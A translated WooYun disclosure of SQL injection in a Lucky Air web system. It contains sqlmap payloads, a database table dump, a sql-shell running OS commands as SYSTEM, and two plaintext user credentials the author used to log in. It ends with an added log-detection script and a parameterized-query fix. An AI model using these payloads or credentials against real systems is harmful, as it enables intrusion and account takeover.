Vulnerability summary

Defect ID: wooyun-2015-0155558

Title: SQL injection in a Lucky Air (祥鹏航空) system (command execution possible via --sql-shell)

Vendor: Lucky Air (祥鹏航空)

Author: Ysql404

Submitted: 2015-11-24 19:06

Fix time: 2016-01-11 16:42

Published: 2016-01-11 16:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-11-24: Details notified to the vendor, awaiting vendor handling
2015-11-27: Vendor has confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and relevant domain experts
2015-12-17: Details disclosed to ordinary white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

SQL injection in a Lucky Air (祥鹏航空) system

Detailed description:

http://**.**.**.**/web/Help.aspx?code=Private, injectable parameter: code

[Screenshot: QQ图片20151124155533.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=Private' AND 8659=8659 AND 'vmjH'='vmjH
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: code=-2518' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162717371,0x5452704744716a5a6b64,0x7165796471),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: code=Private'; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: code=Private' AND SLEEP(5) AND 'oGRy'='oGRy
---
[15:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5
[15:52:34] [INFO] testing if current user is DBA
[15:52:34] [INFO] fetching current user
current user is DBA: True


Database: ticketdb
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| npc_sys_action_log | 8062 |
| shop_commodity_price | 2556 |
| shop_order_item | 2048 |
| shop_address | 1477 |
| shop_order | 1210 |
| npc_sys_action_detail | 978 |
| shop_commodity | 874 |
| shop_commodity_detail | 603 |
| npc_sys_authorization | 320 |
| shop_packages | 305 |
| npc_sys_member_data | 189 |
| npc_sys_member_info | 175 |
| shop_cart | 144 |
| npc_dict_item | 102 |
| npc_sys_menu | 35 |
| npc_sys_user_data | 23 |
| npc_sys_user_info | 22 |
| npc_sys_config | 11 |
| npc_dict_group | 10 |
| npc_info_group | 8 |
| npc_sys_link_user_role | 8 |
| npc_info_content_page | 7 |
| shop_category | 5 |
| npc_sys_role_info | 3 |
| info_adv | 2 |
+----------------------------------------------------+---------+
Database: performance_schema
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| events_waits_summary_by_thread_by_event_name | 5520 |
| events_statements_summary_by_thread_by_event_name | 3300 |
| events_stages_summary_by_thread_by_event_name | 2160 |
| events_statements_summary_by_digest | 1311 |
| events_waits_summary_by_account_by_event_name | 552 |
| events_waits_summary_by_host_by_event_name | 552 |
| events_waits_summary_by_user_by_event_name | 552 |
| setup_instruments | 552 |
| events_statements_summary_by_account_by_event_name | 330 |
| events_statements_summary_by_host_by_event_name | 330 |
| events_statements_summary_by_user_by_event_name | 330 |
| events_waits_summary_global_by_event_name | 276 |
| events_stages_summary_by_account_by_event_name | 216 |
| events_stages_summary_by_host_by_event_name | 216 |
| events_stages_summary_by_user_by_event_name | 216 |
| table_io_waits_summary_by_index_usage | 185 |
| events_waits_summary_by_instance | 180 |
| file_instances | 180 |
| events_statements_summary_global_by_event_name | 165 |
| file_summary_by_instance | 151 |
| objects_summary_global_by_type | 124 |
| table_io_waits_summary_by_table | 124 |
| table_lock_waits_summary_by_table | 124 |
| events_stages_summary_global_by_event_name | 108 |
| file_summary_by_event_name | 42 |
| threads | 20 |
| setup_consumers | 12 |
| session_account_connect_attrs | 8 |
| session_connect_attrs | 8 |
| performance_timers | 5 |
| setup_objects | 4 |
| setup_timers | 4 |
| socket_summary_by_event_name | 3 |
| accounts | 2 |
| hosts | 2 |
| users | 2 |
| events_statements_current | 1 |
| setup_actors | 1 |
+----------------------------------------------------+---------+


Passwords of both administrative and ordinary users are stored in plaintext.

[Screenshot: QQ图片20151124160336.png]

[Screenshot: QQ图片20151124162218.png]

Logged in with two of them:
18687818813/pm110110

[Screenshot: QQ图片20151124163526.png]

行游网 account, containing many orders: xyw123/xyw36369

[Screenshot: QQ图片20151124163532.png]

The system would allow UDF privilege escalation; since port 3389 is not open, I did not proceed further.

Proof of vulnerability:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5
[16:40:07] [INFO] testing if current user is DBA
[16:40:07] [INFO] fetching current user
current user is DBA: True
[16:40:07] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> sys_eval('whoami')
[16:40:10] [INFO] fetching SQL query output: 'sys_eval('whoami')'
sys_eval('whoami'): 'nt authority\\system'
sql-shell> sys_eval('ipconfig')
[16:40:13] [INFO] fetching SQL query output: 'sys_eval('ipconfig')'
[16:40:13] [WARNING] possible server trimmed output detected (probably due to its length and/or content): \r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter \r\n\t
[16:40:13] [INFO] retrieving the length of query output
[16:40:13] [INFO] retrieved: 355
[16:40:28] [INFO] resuming partial value: \r\nWi
sys_eval('ipconfig'): '\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter \\?b1\\?be\\?b5\\?d8\\?c1\\?ac\\?bd\\?d3:\r\n\r\n Connection-specific DNS Suffix . : \r\n IP Address. . . . . . . . . . . . : **.**.**.**\r\n Subnet Mask . . . . . . . . . . . : **.**.**.**\r\n Default Gateway . . . . . . . . . : **.**.**.**\r\n\r\nEthernet adapter \\?b1\\?be\\?b5\\?d8\\?c1\\?ac\\?bd\\?d3 2:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r'
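Added example, not from the report or the affected system: a log check for the payload shapes quoted in the sqlmap output above (boolean-blind, UNION, stacked/time-based SLEEP, and the sys_eval UDF call), run over constructed IIS 6.0 W3C log lines. The field order and every sample entry are assumptions; the payloads are the ones the report quotes, URL-encoded as a server would log them.

```python
import re
from urllib.parse import unquote

# Signatures derived from the four sqlmap techniques and the sys_eval UDF call
# shown in this report; applied to the URL-decoded query string, case-insensitively.
SIGNATURES = {
    "boolean_blind": re.compile(r"'\s*AND\s+\d+\s*=\s*\d+", re.I),
    "union_query": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "stacked_or_time_blind": re.compile(r"SLEEP\s*\(\s*\d+\s*\)", re.I),
    "udf_command_exec": re.compile(r"\bsys_eval\s*\(", re.I),
}

def classify_query(cs_uri_query):
    """Return the signature names matching one cs-uri-query value."""
    decoded = unquote(cs_uri_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_iis_log(log_text):
    """Scan W3C-format IIS log lines; field order is assumed from the #Fields header."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < 6:
            continue
        date, time_, _s_ip, _method, stem, query = fields[:6]
        kinds = classify_query(query)
        if kinds:
            hits.append((date + " " + time_, stem, kinds))
    return hits

# Constructed sample log (IIS 6.0 W3C layout, timestamps in UTC); the payloads are
# the ones quoted in the report, URL-encoded the way a server would record them.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-11-24 07:52:30 10.0.0.5 GET /web/Help.aspx code=Private 200
2015-11-24 07:52:34 10.0.0.5 GET /web/Help.aspx code=Private'%20AND%208659%3D8659%20AND%20'vmjH'%3D'vmjH 200
2015-11-24 07:52:35 10.0.0.5 GET /web/Help.aspx code=-2518'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162717371,0x5452704744716a5a6b64,0x7165796471),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 200
2015-11-24 07:52:36 10.0.0.5 GET /web/Help.aspx code=Private';%20SELECT%20SLEEP(5)-- 200
2015-11-24 07:52:37 10.0.0.5 GET /web/Help.aspx code=Private'%20AND%20SLEEP(5)%20AND%20'oGRy'%3D'oGRy 200
2015-11-24 08:40:10 10.0.0.5 GET /web/Help.aspx code=-2518'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,sys_eval('whoami'),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 200
"""

if __name__ == "__main__":
    for when, stem, kinds in scan_iis_log(SAMPLE_LOG):
        print(when, stem, ", ".join(kinds))
```

Only the first sample line (a legitimate request) produces no hit; a sys_eval match is the one to escalate first, since it means a UDF is already present in the database.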

Remediation:

Filter input.
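Added example, not the affected system's code: the concatenated query that produces this defect class next to the bound-parameter form that removes it, with an allowlist on the code parameter as defence in depth on top of filtering. sqlite3 stands in for the MySQL backend behind Help.aspx; the table and column names are assumptions, and the payload is the boolean-blind one quoted in the report.

```python
import re
import sqlite3

# sqlite3 stands in for the MySQL backend behind Help.aspx; the table and
# column names below are assumptions, not taken from the affected system.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE help_page (code TEXT PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO help_page VALUES (?, ?)",
                     [("Private", "private help text"), ("Public", "public help text")])
    return conn

def lookup_vulnerable(conn, code):
    # The defect class from the report: the request value is spliced into the
    # SQL text, so a quote in it changes the statement instead of the data.
    sql = "SELECT body FROM help_page WHERE code='" + code + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, code):
    # Bound parameter: the driver sends the value separately from the statement,
    # so it is compared as data no matter what characters it contains.
    rows = conn.execute("SELECT body FROM help_page WHERE code=?", (code,))
    return [row[0] for row in rows]

# Defence in depth on top of binding: 'code' is a short identifier, so reject
# anything outside an explicit allowlist before it reaches the database.
CODE_PATTERN = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,31}$")

def is_valid_code(code):
    return CODE_PATTERN.fullmatch(code) is not None

# Boolean-blind payload quoted in the report's sqlmap output.
BOOLEAN_PAYLOAD = "Private' AND 8659=8659 AND 'vmjH'='vmjH"

def demo():
    conn = make_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, "Private"),
        "vuln_payload": lookup_vulnerable(conn, BOOLEAN_PAYLOAD),      # row still returned
        "param_normal": lookup_parameterized(conn, "Private"),
        "param_payload": lookup_parameterized(conn, BOOLEAN_PAYLOAD),  # no such code: []
        "allowlist_blocks_payload": not is_valid_code(BOOLEAN_PAYLOAD),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```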

Copyright notice: when republishing, please credit the source: Ysql404@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-27 16:40

Vendor reply:

CNVD did not directly reproduce the described situation; the case has been forwarded via CNCERT to the Yunnan branch center, which will coordinate follow-up handling with the organisation that operates the website.

Latest status:

None yet